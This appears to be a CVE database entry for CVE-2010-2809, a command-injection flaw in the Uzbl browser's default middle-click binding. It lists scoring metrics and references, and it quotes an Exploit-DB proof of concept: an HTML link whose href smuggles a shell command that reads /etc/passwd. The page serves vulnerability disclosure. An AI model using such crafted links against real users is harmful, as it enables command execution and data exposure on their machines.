CVE-2010-2809 : Detail

CVE-2010-2809

Code Injection
A03-Injection
7.15%V3
Network
2010-08-19
18h00 +00:00
2017-08-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The default configuration of the binding in Uzbl before 2010.08.05 does not properly use the @SELECTED_URI feature, which allows user-assisted remote attackers to execute arbitrary commands via a crafted HREF attribute of an A element in an HTML document.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 34426

Publication date : 2010-08-04 22h00 +00:00
Author : Chuzz
EDB Verified : Yes

source: https://www.securityfocus.com/bid/42297/info uzbl 'uzbl-core' is prone to a vulnerability that lets attackers inject arbitrary commands because the application fails to adequately sanitize user-supplied input. This issue stems from an insecure default configuration setting. To exploit this issue, attackers must entice an unsuspecting user to click on a specially crafted URI with their middle mouse button. Exploiting this issue would permit remote attackers to inject and execute commands with the privileges of a user running the application. <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Test</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> </head> <body> <p><a href=""$(cat /etc/passwd |zenity --text-info)"">click me with middle button</a><br />this will open a zenity dialog with your passwd file. I shouldn't be able to do this.</p> </body> </html>

Products Mentioned

Configuraton 0

Uzbl>>Uzbl >> Version To (including) 2010.04.03

Uzbl>>Uzbl >> Version 2009.12.22

    Uzbl>>Uzbl >> Version 2010.01.04

      References

      http://marc.info/?l=oss-security&m=128111493509265&w=2
      Tags : mailing-list, x_refsource_MLIST
      http://marc.info/?l=oss-security&m=128111994317381&w=2
      Tags : mailing-list, x_refsource_MLIST
      http://www.uzbl.org/news.php?id=29
      Tags : x_refsource_CONFIRM
      http://www.securityfocus.com/bid/42297
      Tags : vdb-entry, x_refsource_BID